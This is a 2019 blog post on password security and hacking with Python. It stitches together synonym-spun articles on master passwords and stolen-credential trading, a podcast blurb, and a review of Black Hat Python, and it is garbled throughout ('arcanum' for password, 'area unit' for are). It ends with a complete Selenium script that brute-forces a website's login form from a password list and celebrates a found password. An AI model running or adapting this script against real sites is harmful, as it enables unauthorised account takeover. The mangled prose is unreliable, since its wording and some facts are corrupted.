Monday, October 7, 2019

Password Cracking | Python | The Hacking Pro


Everywhere you go browsing, you run into sites with arcanum protection. however are you able to keep in mind them all? you'll simply use constant arcanum for each web site, one thing like your birthday. however it's solely a matter of your time before somebody guesses that birthday arcanum. Worse, if you employ constant arcanum all over, then a arcanum-stealing Trojan that slips past your antivirus to capture one password effectively breaches all of your secure sites. you would like to use a fancy, distinctive arcanum for each secure web site, and also the solely sensible thanks to manage that's with a arcanum manager.


The best arcanum managers work on all of your devices, be they desktops, laptops, smartphones, or tablets. They generate unguessable passwords like ir23#m#uBJP!4i0k, keep in mind them for you, and mechanically use those saved passwords to log in to your secure sites.

But there is a drawback. nearly each arcanum manager depends on a master arcanum to lock up all those saved passwords. The master arcanum should be all unguessable, as a result of anyone with access thereto will unlock all of your secure sites. however it conjointly should be all unforgettable, not just like the meaninglessness that comes from a random arcanum generator. If you forget the master arcanum, no one will assist you. On the and facet, this conjointly means that a dishonest worker cannot forced the lock your arcanum store, and also the United States intelligence agency cannot force the corporate to show over your information.

Let's assume you've got done everything right, security-wise. you've got put in associate degree antivirus or security suite. A virtual personal network, or VPN, wraps your network traffic in protecting cryptography. and you have noncommissioned a arcanum manager to contend with your overplus of passwords. you continue to got to keep in mind one insanely secure master arcanum to lock down that arcanum manager. Here area unit some recommendations on choosing a arcanum that is each unforgettable and unguessable.

Make It Poetic
Everybody includes a favorite literary work or song that they're going to always remember. it'd be from Shakespeare, or Pussy Riot, or the Bonze Dog Doo dash Band. regardless of the text or verse, you'll be able to flip it into a arcanum. Here's how.

Start by writing down the primary letter of every language unit, mistreatment capital letters for stressed syllables and keeping any punctuation. Let's do that line from lover and Juliet: "But soft, what lightweight through yonder window breaks?" From that, you'd get baccalaureate ? you'll add A2S2 for Act two, Scene 2, if that is one thing you may always remember. Or 1597 for the year of publication.

If the passage does not have a robust meter, you'll be able to simply take the primary letter of every word, mistreatment the prevailing punctuation and capitalization. beginning with the quote "Be yourself; everybody else is already taken. - honour Wilde", you'll return up with By;eeiat.-OW. Adding a unforgettable range rounds out the arcanum, maybe 1854 (his birthdate) or 1900 (his death).

Your poetic arcanum are fully completely different from these examples, of course. you may begin together with your own meaning song or quotation and convert it to a novel arcanum that no-one else may guess.

Use a Passphrase
Password pundits invariably advise together with all four forms of characters: majuscule letters, minuscule letters, digits, and symbols. The reasoning is that by increasing the pool of characters, you immensely expand the time needed to crack the arcanum. however sheer length conjointly serves to create cracking more durable, and a method to realize a protracted, unforgettable arcanum is to use a passphrase.

Snarky, sensible webcomic XKCD took aim at wacky arcanum schemes that counsel beginning with a typical word, replacement a number of the letters with similar-looking numbers, and tacking on a number of further characters. that may leave you questioning. Was it Tr0ub4dor&3, or Tr0ub4dor3&? or even Tr0m30ne&3? A passphrase like correct horse battery staple is considerably harder to crack, thanks to its length, however conjointly abundant easier to recollect.

Not all arcanum managers allow areas within the master arcanum. No problem! simply choose a personality just like the hyphen or sign to separate the words. professional tip—don't use a personality that needs pressing the shift key. choose words that do not naturally go along, then invent a mnemotechnic story or image to link them. What would you image for "butter-proceeds-goof-scream?"

If you've got hassle developing with unrelated words for your passphrase, there area unit several on-line passphrase generators, together with the ably named CorrectHorseBatteryStaple.net. you'll quite moderately worry concerning employing a passphrase generated by somebody else's rule. therein case, you'll generate multiple passphrases and clip out the primary word from every.

Longer Passwords area unit higher Passwords
Long-time computer wizard Steve Gibson suggests that the key to long, robust passwords is cushioning. If associate degree assaulter cannot crack your arcanum employing a wordbook attack or different straightforward means that, the sole recourse may be a brute-force scan of all doable passwords. and each another character makes that attack massively harder.

Gibson's web site offers a research house Calculator that analyzes any arcanum you enter supported the character sorts used and also the length. The calculator delivers associate degree estimate of however long a brute-force attack would desire crack a given arcanum. it is not a arcanum strength meter, however rather a cracking-time meter, and it's instructive to ascertain however the cracking time goes up after you lengthen the arcanum.

I don't attempt to watch individuals enter their passwords, however I've noticed  quite an few that, supported hand motions, seem to finish in 3 exclamation points. that is not the cushioning i might counsel. First, it needs the shift key. Second, it's too certain. i would not be stunned if arcanum cracking toolkits already enclosed "!!!" in their dictionaries.

Instead, choose 2 close-at-hand keys and alternate, adding one thing like vcvcvcvc. Or opt for 3 characters, like lkjlkjlkjlkj. Gibson's calculator says that it'd take over forty five years for a "massive cracking array" to crack baccalaureate,wLtYdWdB? (the lover and Juliet arcanum from my earlier example). Adding vcvcvcvc raises that to quite a quadrillion centuries.

Long, Strong, and unforgettable
Once you've got invested with in a very arcanum manager and regenerate all of your logins to use robust, distinctive passwords, the sole arcanum you continue to got to keep in mind is that the one that opens the arcanum manager itself. That master arcanum unlocks everything else, therefore you actually got to pay your time developing with a master that you just will keep in mind simply, however that may be not possible for somebody else to guess, or crack.

Work up a arcanum supported a literary work, song, or notable quote. Or produce a passphrase, linking unrelated words with a unforgettable image or story. Then add some easy-to-type cushioning. you may land up with a master arcanum that is each unforgettable and uncrack able.
A cybersecurity professional describes the underground hacker network wherever taken usernames and passwords area unit 'traded like Pokémon cards'
Hackers use secret networks to combination and trade innumerable taken login credentials and passwords, in line with a cybersecurity professional.
While high-profile knowledge breaches create headlines, the important injury to individual users may be worn out tiny increments within the months and years that follow mistreatment taken login credentials.
The apply of commercialism taken passwords is simply growing as aggregation computer code becomes additional refined and hacking becomes additional profitable.
Visit Business Insider's homepage for additional stories.
If you are reading this, it is time to alter all of your passwords.

That's as a result of there is a sensible probability that your login info — or, at least, a past version of it — is current among secret networks wherever hackers trade taken passwords or sell them for profit.

These secret networks area unit solely growing, in line with Alex Heid, chief analysis and development officer at SecurityScorecard, a cybersecurity firm.

"Within the hacking underground community, credentials area unit bought, sold, and listed at no cost like Pokémon cards," Heid told Business corporate executive. "There area unit dozens of various hacking forums that have terabytes of knowledge going back 10-plus years."

These forums primarily care for the darkweb, a network of encrypted sites that do not show up in search algorithms. Login credentials and passwords that create it to those forums generally return from huge knowledge breaches, that have happened ofttimes throughout the past year — in one recent example, 4.9 million DoorDash users' knowledge were taken simply last week.

Read more: These area unit the eight biggest scams folks area unit possibly to fall for on-line

Hackers area unit mistreatment progressively refined info computer code to combination "combo lists" of innumerable login credentials, in line with Heid.

Even if hackers solely have one set of credentials — as an example, a user's Door Dash login — they'll simply create inroads into the user's accounts on different sites. Hackers use "checkers," or programs which will take a user's email address and quickly verify if it's being employed as a login on different sites. From there, hackers generally attempt to log into those different sites mistreatment identical arcanum, sporting that their targets use identical arcanum across platforms. In several cases, they are triple-crown.

With hacking changing into increasingly progressively more and additional} profitable and hackers' computer code changing into more refined, there is no indication that this trend can weigh down any time before long. With in the meanwhile, He advises that users amendment their passwords and make sure that passwords area unit completely different completely different} across different services.

Hacking with Python three - nada Arcanum Cracker

Listen Now
Provided by: SecurityTube.net

Topic: package

Format: Podcast

In this podcast, the speaker explains regarding the way to crack nada arcanum victimization python script. This speaker conjointly teaches the user the way to produce their own tool victimization python programing language.



Book Review: Black Hat Python: Python Programming for Hackers and Pentesters

Black Hat Python may be a clear winner within the field of books for security professionals. Written for people that wish to maneuver into the hacking and penetration testing fields and absolutely perceive what they are doing, this book can challenge readers to quickly come back up to hurry not simply on however hackers work, however a way to build their own tools. It contains lots of examples that show precisely what one has to do with code that builds on itself as you grow in ability, and lots of introductory material. Most chapters conjointly embrace a "Kicking the Tires" section on golf shot the new tools to use. If you browse this book cover-to-cover, you will not come back to the top of it while not a deep understanding of however your systems work, why hacking is feasible, and the way you'll be able to build your own hacking and security testing tools with Python and add-on tools.

Just imagine yourself mistreatment Python for ...

doing network analysis
writing your own someone
manipulating packets
infecting virtual machines
going against application-layer targets
writing skulking trojans
extending the favored Burp (security testing of net applications) Suite
detecting sandboxing and automating keylogging screenshotting
stealing email credentials and positive identification hashes
injecting shellcode into a virtual machines
escalating your privileges on a Windows system
performing creative person poisoning
exfiltrating information
The book contains enough instructive  material and comments at intervals the code that you simply can gain tremendous insight into what you'll be able to do with everything you may learn and a few solid Python scripting ability. i'm undoubtedly shocked at the amount of experience that has been provided during this book's but two hundred pages. even though you get to the top while not building tools of your own, you will a minimum of perceive however others do this. And, if you're employed arduous at following on, you are certain to realize that your skills and insight have improved dramatically.

While this is often a tremendous book with extraordinarily valuable insights, i'd not recommend it for anyone United Nations agency has ne'er programmed/scripted before. it is also not one among those books that you simply will devour and skim many pages once you wish to seek out a solution to a worrying issue. Instead, it'll take some quantity of determined attention. to induce the complete profit, you must jump in, came upon your Kali Linux system because the book suggests, and follow the examples step by step. even though you have been operating within the info security field for years, you're probably to seek out that the expertise can leave you with a deeper understanding than you ever unreal doable.

The author, Justin Seitz, may be a senior security investigator for Immunity, Inc. and clearly is aware of his stuff. he's conjointly the author of grey Hat Python (no starch press, 2009).

If you are actually curious about info security, Python is that the language to find out and this book ought to be supplemental to your library. And, by the way, you'll be able to transfer the code samples from the book if you head to the no starch press web site web.nostarch.com/blackhatpython.



Here's the Table of Contents just in case you are still not convinced you wish this book.

1 fixing Your Python setting putting in Kali Linux WingIDE a pair of The Network: Basics Python Networking in a very Paragraph protocol shopper UDP shopper protocol Server exchange Netcat Kicking the Tires Building a protocol Proxy Kicking the Tires SSH with Paramiko Kicking the Tires SSH Tunneling Kicking the Tires three The Network: Raw Sockets and Sniffing Building a UDP Host Discovery Tool Packet Sniffing on Windows and Linux Kicking the Tires secret writing the information processing Layer Kicking the Tires secret writing ICMP Kicking the Tires four Owning the Network with Scapy Stealing Email Credentials Kicking the Tires creative person Cache Poisoning with Scapy Kicking the Tires PCAP process Kicking the Tires five net Hackery The Socket Library of the net: urllib2 Mapping Open supply Web App Installations Kicking the Tires Brute-Forcing Directories and File Locations Kicking the Tires Brute-Forcing markup language type Authentication Kicking the Tires half dozen Extending Burp Proxy fixing Burp Fuzzing Kicking the Tires Bing for Burp Kicking the Tires Turning web site Content into positive identification Gold Kicking the Tires seven GitHub Command and management fixing a GitHub Account making Modules Trojan Configuration Building a GitHub-Aware Trojan Hacking Python’s import practicality Kicking the Tires eight Common Trojaning Tasks on Windows Keylogging for Fun and Keystrokes Kicking the Tires Taking Screenshots Pythonic Shellcode Execution Kicking the Tires Sandbox Detection nine Fun with web mortal Man-in-the-Browser (Kind Of) making the Server Kicking the Tires that is COM Automation for Exfiltration Kicking the Tires one0 Windows Privilege increase putting in the conditions making a method Monitor method observance with WMI Kicking the Tires Windows Token Privileges Winning the Race Kicking the Tires Code Injection Kicking the Tires eleven Automating Offensive Forensics Installation Profiles Grabbing positive identification Hashes Direct Code Injection Kicking the Tires Index
Whether you are curious about changing into a heavy hacker/penetration tester or simply wish to grasp however they work, this book is one you would like to browse. Intense, technically sound, and eye-opening, it may well be an honest investment in your skilled development.


 Python Hacking Script
      import sys
import datetime
import selenium
import requests
import time as t
from sys import stdout


from selenium import webdriver
from optparse import OptionParser
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import NoSuchElementException


#Graphics
class color:
   PURPLE = '\033[95m'
   CYAN = '\033[96m'
   DARKCYAN = '\033[36m'
   BLUE = '\033[94m'
   GREEN = '\033[92m'
   YELLOW = '\033[93m'
   RED = '\033[91m'
   BOLD = '\033[1m'
   UNDERLINE = '\033[4m'
   END = '\033[0m'
   CWHITE  = '\33[37m'


#Config#
parser = OptionParser()
now = datetime.datetime.now()


#Args
parser.add_option("-u", "--username", dest="username",help="Choose the username")
parser.add_option("--usernamesel", dest="usernamesel",help="Choose the username selector")
parser.add_option("--passsel", dest="passsel",help="Choose the password selector")
parser.add_option("--loginsel", dest="loginsel",help= "Choose the login button selector")
parser.add_option("--passlist", dest="passlist",help="Enter the password list directory")
parser.add_option("--website", dest="website",help="choose a website")
(options, args) = parser.parse_args()




def wizard():
    print (banner)
    website = raw_input(color.GREEN + color.BOLD + '\n[~] ' + color.CWHITE + 'Enter a website: ')
    sys.stdout.write(color.GREEN + '[!] '+color.CWHITE + 'Checking if site exists '),
    sys.stdout.flush()
    t.sleep(1)
    try:
        request = requests.get(website)
        if request.status_code == 200:
            print (color.GREEN + '[OK]'+color.CWHITE)
            sys.stdout.flush()
    except selenium.common.exceptions.NoSuchElementException:
        pass
    except KeyboardInterrupt:
        print (color.RED + '[!]'+color.CWHITE+ 'User used Ctrl-c to exit')
        exit()
    except:
        t.sleep(1)
        print (color.RED + '[X]'+color.CWHITE)
        t.sleep(1)
        print (color.RED + '[!]'+color.CWHITE+ ' Website could not be located make sure to use http / https')
        exit()

    username_selector = raw_input(color.GREEN + '[~] ' + color.CWHITE + 'Enter the username selector: ')
    password_selector = raw_input(color.GREEN + '[~] ' + color.CWHITE + 'Enter the password selector: ')
    login_btn_selector = raw_input(color.GREEN + '[~] ' + color.CWHITE + 'Enter the Login button selector: ')
    username = raw_input(color.GREEN + '[~] ' + color.CWHITE + 'Enter the username to brute-force: ')
    pass_list = raw_input(color.GREEN + '[~] ' + color.CWHITE + 'Enter a directory to a password list: ')
    brutes(username, username_selector ,password_selector,login_btn_selector,pass_list, website)

def brutes(username, username_selector ,password_selector,login_btn_selector,pass_list, website):
    f = open(pass_list, 'r')
    driver = webdriver.Chrome()
    optionss = webdriver.ChromeOptions()
    optionss.add_argument("--disable-popup-blocking")
    optionss.add_argument("--disable-extensions")
    count = 1 #count
    browser = webdriver.Chrome(chrome_options=optionss)
    while True:
        try:
            for line in f:
                browser.get(website)
                t.sleep(2)
                Sel_user = browser.find_element_by_css_selector(username_selector) #Finds Selector
                Sel_pas = browser.find_element_by_css_selector(password_selector) #Finds Selector
                enter = browser.find_element_by_css_selector(login_btn_selector) #Finds Selector
                # browser.find_element_by_css_selector(password_selector).clear()
                # browser.find_element_by_css_selector(username_selector).clear()
                Sel_user.send_keys(username)
                Sel_pas.send_keys(line)
                print '------------------------'
                print (color.GREEN + 'Tried password: '+color.RED + line + color.GREEN + 'for user: '+color.RED+ username)
                print '------------------------'
        except KeyboardInterrupt: #returns to main menu if ctrl C is used
            exit()
        except selenium.common.exceptions.NoSuchElementException:
            print 'AN ELEMENT HAS BEEN REMOVED FROM THE PAGE SOURCE THIS COULD MEAN 2 THINGS THE PASSWORD WAS FOUND OR YOU HAVE BEEN LOCKED OUT OF ATTEMPTS! '
            print 'LAST PASS ATTEMPT BELLOW'
            print color.GREEN + 'Password has been found: {0}'.format(line)
            print color.YELLOW + 'Have fun :)'
            exit()



banner = color.BOLD + color.RED +'''
  _    _       _       _
 | |  | |     | |     | |
 | |__| | __ _| |_ ___| |__
 |  __  |/ _` | __/ __| '_ \\
 | |  | | (_| | || (__| | | |
 |_|  |_|\__,_|\__\___|_| |_|
  {0}[{1}-{2}]--> {3}V.1.0
  {4}[{5}-{6}]--> {7}coded by Metachar
  {8}[{9}-{10}]-->{11} brute-force tool                      '''.format(color.RED, color.CWHITE,color.RED,color.GREEN,color.RED, color.CWHITE,color.RED,color.GREEN,color.RED, color.CWHITE,color.RED,color.GREEN)

driver = webdriver.Chrome()
optionss = webdriver.ChromeOptions()
optionss.add_argument("--disable-popup-blocking")
optionss.add_argument("--disable-extensions")
count = 1 #count

if options.username == None:
    if options.usernamesel == None:
        if options.passsel == None:
            if options.loginsel == None:
                if options.passlist == None:
                    if options.website == None:
                        wizard()


username = options.username
username_selector = options.usernamesel
password_selector = options.passsel
login_btn_selector = options.loginsel
website = options.website
pass_list = options.passlist
print banner
brutes(username, username_selector ,password_selector,login_btn_selector,pass_list, website)